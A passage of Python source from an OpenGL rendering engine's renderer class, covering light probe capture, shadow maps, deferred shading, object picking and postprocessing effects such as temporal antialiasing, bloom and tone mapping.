uniform_data['LIGHT_DIRECTION'][...] = main_light.transform.front
uniform_data['LIGHT_COLOR'][...] = main_light.light_color[:3]
self.uniform_light_buffer.bind_uniform_block(data=uniform_data)
self.uniform_point_light_buffer.bind_uniform_block(data=self.uniform_point_light_data)
def render_light_probe(self, light_probe):
if light_probe.isRendered:
return
logger.info("Rendering Light Probe")
# Set Valid
light_probe.isRendered = True
camera = self.scene_manager.main_camera
old_pos = camera.transform.get_pos().copy()
old_rot = camera.transform.get_rotation().copy()
old_fov = camera.fov
old_aspect = camera.aspect
old_render_font = RenderOption.RENDER_FONT
old_render_skeleton = RenderOption.RENDER_SKELETON_ACTOR
old_render_effect = RenderOption.RENDER_EFFECT
old_render_collision = RenderOption.RENDER_COLLISION
old_render_ssr = self.postprocess.is_render_ssr
old_render_motion_blur = self.postprocess.is_render_motion_blur
old_antialiasing = self.postprocess.anti_aliasing
old_debug_absolute = self.postprocess.debug_absolute
old_debug_mipmap = self.postprocess.debug_mipmap
old_debug_intensity_min = self.postprocess.debug_intensity_min
old_debug_intensity_max = self.postprocess.debug_intensity_max
# set render light probe
RenderOption.RENDER_LIGHT_PROBE = True
RenderOption.RENDER_SKELETON_ACTOR = False
RenderOption.RENDER_EFFECT = False
RenderOption.RENDER_FONT = False
self.postprocess.is_render_motion_blur = False
self.postprocess.anti_aliasing = AntiAliasing.NONE_AA
camera.update_projection(fov=90.0, aspect=1.0)
def render_cube_face(dst_texture, target_face, pos, rotation):
camera.transform.set_pos(pos)
camera.transform.set_rotation(rotation)
camera.update(force_update=True)
# render
self.render_scene()
# copy
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(dst_texture, target_face=target_face)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.mirror_framebuffer(src_framebuffer)
return dst_texture
target_faces = [GL_TEXTURE_CUBE_MAP_POSITIVE_X,
GL_TEXTURE_CUBE_MAP_NEGATIVE_X,
GL_TEXTURE_CUBE_MAP_POSITIVE_Y,
GL_TEXTURE_CUBE_MAP_NEGATIVE_Y,
GL_TEXTURE_CUBE_MAP_POSITIVE_Z,
GL_TEXTURE_CUBE_MAP_NEGATIVE_Z]
pos = light_probe.transform.get_pos()
camera_rotations = [[0.0, math.pi * 1.5, 0.0],
[0.0, math.pi * 0.5, 0.0],
[math.pi * -0.5, math.pi * 1.0, 0.0],
[math.pi * 0.5, math.pi * 1.0, 0.0],
[0.0, math.pi * 1.0, 0.0],
[0.0, 0.0, 0.0]]
# render atmosphere scene to light_probe textures.
RenderOption.RENDER_ONLY_ATMOSPHERE = True
texture_cube = RenderTargets.LIGHT_PROBE_ATMOSPHERE
for i in range(6):
render_cube_face(texture_cube, target_faces[i], pos, camera_rotations[i])
texture_cube.generate_mipmap()
# render final scene to temp textures.
RenderOption.RENDER_ONLY_ATMOSPHERE = False
texture_cube = light_probe.texture_probe
for i in range(6):
render_cube_face(texture_cube, target_faces[i], pos, camera_rotations[i])
texture_cube.generate_mipmap()
# convolution
texture_info = light_probe.texture_probe.get_texture_info()
texture_info['name'] = 'temp_cube'
temp_cube = CreateTexture(**texture_info)
mipmap_count = temp_cube.get_mipmap_count()
face_matrixies = [np.array([[0, 0, 1, 0], [0, 1, 0, 0], [-1, 0, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[0, 0, -1, 0], [0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 0, 1, 0], [0, -1, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 0, -1, 0], [0, 1, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]], dtype=np.float32)]
convolve_environment = self.resource_manager.get_material_instance('convolve_environment')
convolve_environment.use_program()
for i in range(6):
for lod in range(mipmap_count):
self.framebuffer_manager.bind_framebuffer(temp_cube, target_face=target_faces[i], target_level=lod)
glClear(GL_COLOR_BUFFER_BIT)
convolve_environment.bind_uniform_data("texture_environment", texture_cube)
convolve_environment.bind_uniform_data("face_matrix", face_matrixies[i])
convolve_environment.bind_uniform_data("lod", float(lod))
convolve_environment.bind_uniform_data("mipmap_count", float(mipmap_count))
self.postprocess.draw_elements()
light_probe.replace_texture_probe(temp_cube)
self.rendertarget_manager.get_temporary('temp_cube', light_probe.texture_probe)
RenderOption.RENDER_LIGHT_PROBE = False
RenderOption.RENDER_SKELETON_ACTOR = old_render_skeleton
RenderOption.RENDER_EFFECT = old_render_effect
RenderOption.RENDER_FONT = old_render_font
RenderOption.RENDER_COLLISION = old_render_collision
self.postprocess.is_render_ssr = old_render_ssr
self.postprocess.is_render_motion_blur = old_render_motion_blur
self.postprocess.anti_aliasing = old_antialiasing
self.postprocess.debug_absolute = old_debug_absolute
self.postprocess.debug_mipmap = old_debug_mipmap
self.postprocess.debug_intensity_min = old_debug_intensity_min
self.postprocess.debug_intensity_max = old_debug_intensity_max
camera.update_projection(old_fov, old_aspect)
camera.transform.set_pos(old_pos)
camera.transform.set_rotation(old_rot)
camera.update(force_update=True)
def render_gbuffer(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.DIFFUSE,
RenderTargets.MATERIAL,
RenderTargets.WORLD_NORMAL,
depth_texture=RenderTargets.DEPTH)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# render terrain
if self.scene_manager.terrain.is_render_terrain:
self.scene_manager.terrain.render_terrain(RenderMode.GBUFFER)
# render static actor
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.GBUFFER,
self.scene_manager.static_solid_render_infos)
# render velocity
self.framebuffer_manager.bind_framebuffer(RenderTargets.VELOCITY)
glClear(GL_COLOR_BUFFER_BIT)
if RenderOption.RENDER_STATIC_ACTOR:
self.postprocess.render_velocity(RenderTargets.DEPTH)
# render skeletal actor gbuffer
if RenderOption.RENDER_SKELETON_ACTOR:
self.framebuffer_manager.bind_framebuffer(RenderTargets.DIFFUSE,
RenderTargets.MATERIAL,
RenderTargets.WORLD_NORMAL,
RenderTargets.VELOCITY,
depth_texture=RenderTargets.DEPTH)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.GBUFFER,
self.scene_manager.skeleton_solid_render_infos)
def render_shadow(self):
light = self.scene_manager.main_light
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = light.shadow_view_projection
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = light.shadow_view_projection
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
# static shadow
self.framebuffer_manager.bind_framebuffer(depth_texture=RenderTargets.STATIC_SHADOWMAP)
glClear(GL_DEPTH_BUFFER_BIT)
glFrontFace(GL_CCW)
if self.scene_manager.terrain.is_render_terrain:
self.scene_manager.terrain.render_terrain(RenderMode.SHADOW)
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR, RenderMode.SHADOW, self.scene_manager.static_shadow_render_infos, self.shadowmap_material)
# dyanmic shadow
self.framebuffer_manager.bind_framebuffer(depth_texture=RenderTargets.DYNAMIC_SHADOWMAP)
glClear(GL_DEPTH_BUFFER_BIT)
glFrontFace(GL_CCW)
if RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR, RenderMode.SHADOW, self.scene_manager.skeleton_shadow_render_infos, self.shadowmap_skeletal_material)
# composite shadow maps
self.framebuffer_manager.bind_framebuffer(RenderTargets.COMPOSITE_SHADOWMAP)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glDisable(GL_CULL_FACE)
self.postprocess.render_composite_shadowmap(RenderTargets.STATIC_SHADOWMAP, RenderTargets.DYNAMIC_SHADOWMAP)
def render_preprocess(self):
# Linear depth
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
# Screen Space Reflection
if self.postprocess.is_render_ssr:
self.framebuffer_manager.bind_framebuffer(RenderTargets.SCREEN_SPACE_REFLECTION)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_screen_space_reflection(RenderTargets.HDR,
RenderTargets.WORLD_NORMAL,
RenderTargets.MATERIAL,
RenderTargets.VELOCITY,
RenderTargets.LINEAR_DEPTH)
# swap ssr resolve textures
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED, RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV = \
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV, RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED
self.framebuffer_manager.bind_framebuffer(RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_screen_space_reflection_resolve(RenderTargets.SCREEN_SPACE_REFLECTION,
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV,
RenderTargets.VELOCITY)
# SSAO
if self.postprocess.is_render_ssao:
temp_ssao = self.rendertarget_manager.get_temporary('temp_ssao', RenderTargets.SSAO)
self.framebuffer_manager.bind_framebuffer(RenderTargets.SSAO)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_ssao(texture_size=(RenderTargets.SSAO.width, RenderTargets.SSAO.height),
texture_lod=self.rendertarget_manager.texture_lod_in_ssao,
texture_normal=RenderTargets.WORLD_NORMAL,
texture_linear_depth=RenderTargets.LINEAR_DEPTH)
self.postprocess.render_gaussian_blur(RenderTargets.SSAO, temp_ssao)
def render_solid(self):
if RenderingType.DEFERRED_RENDERING == self.render_option_manager.rendering_type:
self.postprocess.render_deferred_shading(self.scene_manager.get_light_probe_texture(),
self.scene_manager.atmosphere)
elif RenderingType.FORWARD_RENDERING == self.render_option_manager.rendering_type:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.static_solid_render_infos)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.skeleton_solid_render_infos)
def render_translucent(self):
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.static_translucent_render_infos)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.skeleton_translucent_render_infos)
for render_custom_translucent_callback in self.render_custom_translucent_callbacks:
render_custom_translucent_callback()
self.render_custom_translucent_callbacks.clear()
def render_effect(self):
self.scene_manager.effect_manager.render()
def render_actors(self, render_group, render_mode, render_infos, scene_material_instance=None):
if len(render_infos) < 1:
return
last_actor = None
last_actor_material = None
last_actor_material_instance = None
if scene_material_instance is not None:
scene_material_instance.use_program()
scene_material_instance.bind_material_instance()
# render
for render_info in render_infos:
actor = render_info.actor
geometry = render_info.geometry
actor_material = render_info.material
actor_material_instance = render_info.material_instance
is_instancing = actor.is_instancing()
if RenderMode.GBUFFER == render_mode or RenderMode.FORWARD_SHADING == render_mode:
if last_actor_material != actor_material and actor_material is not None:
actor_material.use_program()
if last_actor_material_instance != actor_material_instance and actor_material_instance is not None:
actor_material_instance.bind_material_instance()
actor_material_instance.bind_uniform_data('is_render_gbuffer', RenderMode.GBUFFER == render_mode)
if RenderMode.FORWARD_SHADING == render_mode:
actor_material_instance.bind_uniform_data('texture_probe', self.scene_manager.get_light_probe_texture())
actor_material_instance.bind_uniform_data('texture_shadow', RenderTargets.COMPOSITE_SHADOWMAP)
actor_material_instance.bind_uniform_data('texture_ssao', RenderTargets.SSAO)
actor_material_instance.bind_uniform_data('texture_scene_reflect', RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED)
# Bind Atmosphere
self.scene_manager.atmosphere.bind_precomputed_atmosphere(actor_material_instance)
elif RenderMode.SHADOW == render_mode:
if last_actor_material_instance != actor_material_instance and actor_material_instance is not None:
# get diffuse texture from actor material instance
data_diffuse = actor_material_instance.get_uniform_data('texture_diffuse')
scene_material_instance.bind_uniform_data('texture_diffuse', data_diffuse)
if last_actor != actor:
material_instance = scene_material_instance or actor_material_instance
if RenderMode.OBJECT_ID == render_mode:
material_instance.bind_uniform_data('object_id', actor.get_object_id())
elif RenderMode.GIZMO == render_mode:
material_instance.bind_uniform_data('color', actor.get_object_color())
material_instance.bind_uniform_data('is_instancing', is_instancing)
material_instance.bind_uniform_data('model', actor.transform.matrix)
if render_group == RenderGroup.SKELETON_ACTOR:
animation_buffer = actor.get_animation_buffer(geometry.skeleton.index)
prev_animation_buffer = actor.get_prev_animation_buffer(geometry.skeleton.index)
material_instance.bind_uniform_data('bone_matrices', animation_buffer, num=len(animation_buffer))
material_instance.bind_uniform_data('prev_bone_matrices', prev_animation_buffer, num=len(prev_animation_buffer))
# draw
if is_instancing:
geometry.draw_elements_instanced(actor.get_instance_render_count(), self.actor_instance_buffer, [actor.instance_matrix, ])
else:
geometry.draw_elements()
last_actor = actor
last_actor_material = actor_material
last_actor_material_instance = actor_material_instance
def render_selected_object(self):
selected_object = self.scene_manager.get_selected_object()
if selected_object is not None:
self.framebuffer_manager.bind_framebuffer(RenderTargets.TEMP_RGBA8)
glDisable(GL_DEPTH_TEST)
glDepthMask(False)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.set_blend_state(False)
object_type = type(selected_object)
if SkeletonActor == object_type and RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.SELECTED_OBJECT,
self.scene_manager.selected_object_render_info,
self.selcted_skeletal_object_material)
elif StaticActor == object_type and RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.SELECTED_OBJECT,
self.scene_manager.selected_object_render_info,
self.selcted_static_object_material)
elif Spline3D == object_type:
self.debug_line_manager.bind_render_spline_program()
self.debug_line_manager.render_spline(selected_object, Float4(1.0, 1.0, 1.0, 1.0))
else:
return
# composite
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
self.selcted_object_composite_material.use_program()
self.selcted_object_composite_material.bind_uniform_data("texture_mask", RenderTargets.TEMP_RGBA8)
self.postprocess.draw_elements()
def render_axis_gizmo(self, render_mode):
if self.scene_manager.get_selected_object() is not None:
axis_gizmo_actor = self.scene_manager.get_axis_gizmo()
material_instance = None
if RenderMode.GIZMO == render_mode:
material_instance = self.render_color_material
elif RenderMode.OBJECT_ID == render_mode:
material_instance = self.static_object_id_material
material_instance.use_program()
material_instance.bind_uniform_data('is_instancing', False)
material_instance.bind_uniform_data('model', axis_gizmo_actor.transform.matrix)
geometries = axis_gizmo_actor.get_geometries()
for i, geometry in enumerate(geometries):
if RenderMode.GIZMO == render_mode:
material_instance.bind_uniform_data('color', axis_gizmo_actor.get_object_color(i))
elif RenderMode.OBJECT_ID == render_mode:
material_instance.bind_uniform_data('object_id', axis_gizmo_actor.get_object_id(i))
geometry.draw_elements()
def render_object_id(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.OBJECT_ID, depth_texture=RenderTargets.OBJECT_ID_DEPTH)
glDisable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
self.set_blend_state(False)
# render static actor object id
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.static_solid_render_infos,
self.static_object_id_material)
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.static_translucent_render_infos,
self.static_object_id_material)
# render skeletal actor object id
if RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.skeleton_solid_render_infos,
self.skeletal_object_id_material)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.skeleton_translucent_render_infos,
self.skeletal_object_id_material)
# spline object id
self.debug_line_manager.bind_render_spline_program()
for spline in self.scene_manager.splines:
object_id = spline.get_object_id()
self.debug_line_manager.render_spline(spline, Float4(object_id, object_id, object_id, 1.0), add_width=10.0)
# spline gizmo object id
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.spline_gizmo_render_infos,
self.static_object_id_material)
# gizmo object id
glClear(GL_DEPTH_BUFFER_BIT)
self.render_axis_gizmo(RenderMode.OBJECT_ID)
def render_heightmap(self, actor):
self.framebuffer_manager.bind_framebuffer(RenderTargets.TEMP_HEIGHT_MAP)
self.set_blend_state(blend_enable=True, equation=GL_MAX, func_src=GL_ONE, func_dst=GL_ONE)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glDisable(GL_CULL_FACE)
glDisable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
self.render_heightmap_material.use_program()
self.render_heightmap_material.bind_material_instance()
self.render_heightmap_material.bind_uniform_data('model', actor.transform.matrix)
self.render_heightmap_material.bind_uniform_data('bound_box_min', actor.bound_box.bound_min)
self.render_heightmap_material.bind_uniform_data('bound_box_max', actor.bound_box.bound_max)
actor.get_geometry(0).draw_elements()
if RenderTargets.TEMP_HEIGHT_MAP.enable_mipmap:
self.postprocess.render_generate_max_z(RenderTargets.TEMP_HEIGHT_MAP)
def render_bones(self):
glDisable(GL_DEPTH_TEST)
glDisable(GL_CULL_FACE)
mesh = self.resource_manager.get_mesh("Cube")
static_actors = self.scene_manager.static_actors[:]
if mesh and self.debug_bone_material:
material_instance = self.debug_bone_material
material_instance.use_program()
material_instance.bind()
def draw_bone(mesh, skeleton_mesh, parent_matrix, material_instance, bone, root_matrix, isAnimation):
if isAnimation:
bone_transform = skeleton_mesh.get_animation_transform(bone.name, frame)
else:
bone_transform = np.linalg.inv(bone.inv_bind_matrix)
if bone.children:
for child_bone in bone.children:
if isAnimation:
bone_transform = skeleton_mesh.get_animation_transform(bone.name, frame)
child_transform = skeleton_mesh.get_animation_transform(child_bone.name, frame)
else:
bone_transform = np.linalg.inv(bone.inv_bind_matrix)
child_transform = np.linalg.inv(child_bone.inv_bind_matrix)
material_instance.bind_uniform_data("mat1", np.dot(bone_transform, root_matrix))
material_instance.bind_uniform_data("mat2", np.dot(child_transform, root_matrix))
mesh.draw_elements()
draw_bone(mesh, skeleton_mesh, bone_transform.copy(), material_instance, child_bone, root_matrix, isAnimation)
else:
material_instance.bind_uniform_data("mat1", np.dot(bone_transform, root_matrix))
child_transform = np.dot(bone_transform, root_matrix)
child_transform[3, :] += child_transform[1, :]
material_instance.bind_uniform_data("mat2", child_transform)
mesh.draw_elements()
for static_actor in static_actors:
if static_actor.model and static_actor.model.mesh and static_actor.model.mesh.skeletons:
skeletons = static_actor.model.mesh.skeletons
skeleton_mesh = static_actor.model.mesh
frame_count = skeleton_mesh.get_animation_frame_count()
frame = math.fmod(self.core_manager.current_time * 30.0, frame_count) if frame_count > 0.0 else 0.0
isAnimation = frame_count > 0.0
for skeleton in skeletons:
matrix = static_actor.transform.matrix
for bone in skeleton.hierachy:
draw_bone(mesh, skeleton_mesh, Matrix4().copy(), material_instance, bone, matrix, isAnimation)
def render_postprocess(self):
# bind frame buffer
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
# copy HDR target
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR_TEMP)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Temporal AA
if AntiAliasing.TAA == self.postprocess.anti_aliasing:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_temporal_antialiasing(RenderTargets.HDR_TEMP,
RenderTargets.TAA_RESOLVE,
RenderTargets.VELOCITY)
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(RenderTargets.TAA_RESOLVE)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Bloom
if self.postprocess.is_render_bloom:
self.postprocess.render_bloom(RenderTargets.HDR)
# Light Shaft
if self.postprocess.is_render_light_shaft:
self.framebuffer_manager.bind_framebuffer(RenderTargets.LIGHT_SHAFT)
self.postprocess.render_light_shaft(RenderTargets.ATMOSPHERE, RenderTargets.DEPTH)
# Depth Of Field
if self.postprocess.is_render_depth_of_field:
self.postprocess.render_depth_of_field()
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
RenderTargets.HDR.generate_mipmap()
# Tone Map
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_tone_map(RenderTargets.HDR,
RenderTargets.BLOOM_0,
RenderTargets.BLOOM_1,
RenderTargets.BLOOM_2,
RenderTargets.BLOOM_3,
RenderTargets.BLOOM_4,
RenderTargets.LIGHT_SHAFT)
# MSAA Test
if AntiAliasing.MSAA == self.postprocess.anti_aliasing:
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
# resolve MSAA
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Motion Blur
if self.postprocess.is_render_motion_blur:
backbuffer_copy = self.rendertarget_manager.get_temporary('backbuffer_copy', RenderTargets.BACKBUFFER)
self.framebuffer_manager.bind_framebuffer(backbuffer_copy)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_motion_blur(RenderTargets.VELOCITY, RenderTargets.BACKBUFFER)
# copy to backbuffer
src_framebuffer = self.framebuffer_manager.get_framebuffer(backbuffer_copy)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
def render_log(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
self.font_manager.render_log(self.viewport.width, self.viewport.height)
def render_text(self, text_render_data, offset_x, offset_y, canvas_width, canvas_height):
if 0 < text_render_data.render_count:
self.font_shader.use_program()
self.font_shader.bind_material_instance()
self.font_shader.bind_uniform_data("texture_font", text_render_data.font_data.texture)
self.font_shader.bind_uniform_data("font_size", text_render_data.font_size)
self.font_shader.bind_uniform_data("offset", (offset_x, offset_y))
self.font_shader.bind_uniform_data("inv_canvas_size", (1.0 / canvas_width, 1.0 / canvas_height))
self.font_shader.bind_uniform_data("count_of_side", text_render_data.font_data.count_of_side)
self.postprocess.draw_elements_instanced(text_render_data.render_count, self.font_instance_buffer, [text_render_data.render_queue, ])
def render_axis(self):
camera = self.scene_manager.main_camera
line_thickness = 2.0
line_length = 100.0
line_size = Float2(line_length / self.core_manager.game_backend.width, line_length / self.core_manager.game_backend.height)
line_offset = line_size - 1.0
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[2][0:2] * line_size, color=Float4(0.0, 0.0, 1.0, 1.0), width=line_thickness)
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[1][0:2] * line_size, color=Float4(0.0, 1.0, 0.0, 1.0), width=line_thickness)
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[0][0:2] * line_size, color=Float4(1.0, 0.0, 0.0, 1.0), width=line_thickness)
def render_scene(self):
main_camera = self.scene_manager.main_camera
# bind scene constants uniform blocks
self.bind_uniform_blocks()
self.set_blend_state(False)
glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST)
glPolygonMode(GL_FRONT_AND_BACK, self.view_mode)
# glEnable(GL_FRAMEBUFFER_SRGB)
glEnable(GL_MULTISAMPLE)
glEnable(GL_TEXTURE_CUBE_MAP_SEAMLESS)
glDepthFunc(GL_LEQUAL)
glEnable(GL_CULL_FACE)
glFrontFace(GL_CCW)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
if self.postprocess.is_render_shader() and not RenderOption.RENDER_LIGHT_PROBE:
""" debug shader """
self.set_blend_state(False)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_material_instance()
elif RenderOption.RENDER_ONLY_ATMOSPHERE and RenderOption.RENDER_LIGHT_PROBE:
""" render light probe preprocess """
self.framebuffer_manager.bind_framebuffer(RenderTargets.COMPOSITE_SHADOWMAP)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.WORLD_NORMAL, depth_texture=RenderTargets.DEPTH)
glClearColor(0.0, 1.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
# render atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.scene_manager.atmosphere.render_precomputed_atmosphere(RenderTargets.LINEAR_DEPTH,
RenderTargets.COMPOSITE_SHADOWMAP,
RenderOption.RENDER_LIGHT_PROBE)
# done render light probe preprocess
return
else:
""" render normal scene """
self.scene_manager.ocean.simulateFFTWaves()
# render gbuffer & preprocess
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection_jitter
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection_jitter
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
self.render_gbuffer()
self.render_preprocess()
self.render_shadow()
# render solid
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection_jitter
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection_jitter
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
glFrontFace(GL_CCW)
glDepthMask(False) # cause depth prepass and gbuffer
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glClear(GL_COLOR_BUFFER_BIT)
self.render_solid()
# copy HDR Target
src_framebuffer = self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
dst_framebuffer = self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR_TEMP)
glClear(GL_COLOR_BUFFER_BIT)
dst_framebuffer.copy_framebuffer(src_framebuffer)
src_framebuffer.bind_framebuffer()
# set common projection matrix
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
# render ocean
if self.scene_manager.ocean.is_render_ocean:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glDisable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
self.scene_manager.ocean.render_ocean(atmosphere=self.scene_manager.atmosphere,
texture_scene=RenderTargets.HDR_TEMP,
texture_linear_depth=RenderTargets.LINEAR_DEPTH,
texture_probe=RenderTargets.LIGHT_PROBE_ATMOSPHERE,
texture_shadow=RenderTargets.COMPOSITE_SHADOWMAP)
# re copy Linear depth
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
# render atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.framebuffer_manager.bind_framebuffer(RenderTargets.ATMOSPHERE,
RenderTargets.ATMOSPHERE_INSCATTER)
self.scene_manager.atmosphere.render_precomputed_atmosphere(RenderTargets.LINEAR_DEPTH,
RenderTargets.COMPOSITE_SHADOWMAP,
RenderOption.RENDER_LIGHT_PROBE)
glEnable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(False)
# Composite Atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
self.set_blend_state(True, GL_FUNC_ADD, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
